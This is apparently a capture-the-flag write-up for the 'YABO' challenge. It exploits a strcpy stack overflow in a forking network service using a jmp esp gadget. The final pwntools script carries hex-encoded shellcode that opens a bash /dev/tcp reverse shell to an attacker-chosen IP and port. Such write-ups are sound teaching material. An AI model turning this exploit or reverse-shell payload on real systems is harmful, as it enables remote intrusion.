# yabo ## Files {% embed url="" %} ## The binary ![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-Mk5GtJlwXf2zll6rUPa%2F-Mk5MZ1rNUa5C5-YXFA3%2Fimage.png?alt=media\&token=9d410273-910a-4f49-a341-bdec198af534) The binary starts a listener on port 9999 and waited for input. ![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-Mk5GtJlwXf2zll6rUPa%2F-Mk5NCuPVZARVbhXC-59%2Fimage.png?alt=media\&token=232d5467-1bfe-4342-9f95-0f96861b7cbb) ## Buffer Overflow The program copies the input to a 1024 bytes buffer with strcpy and thus has a buffer overflow vulnerability. ![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-Mk5GtJlwXf2zll6rUPa%2F-Mk5O321my3XpaHrAUwf%2Fimage.png?alt=media\&token=f94284e1-c15a-4487-a0e5-83d4f22b2473) We can use a jmp esp gadget to jump to our shellcode and run it. I used the following shellcode: {% embed url="" %} A simple /bin/sh shellcode wouldn't work since the remote process that receives the input is a fork, the shell will be popped on the server but won't receive input through the socket. With the shellcode I used, exploiting is as easy as appending the desired command to the shellcode, so I used a bash + /dev/tcp shell. ## Final Exploit ```python #!/usr/bin/env python from pwn import * e = context.binary = ELF('./YABO',checksec=False) if args.REMOTE: io = remote('challenge.ctf.games',32762) else: io = remote('127.0.0.1',9999) ip = sys.argv[1] port = sys.argv[2] buf = 1044*'A' buf += p32(0x80492e2) # jmp esp buf += "\x31\xc0\x31\xd2\xb0\x0b\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f" + ip + "\x2f" + port + "\x20\x30\x3e\x26\x31\x22" io.sendline(buf) io.interactive() ```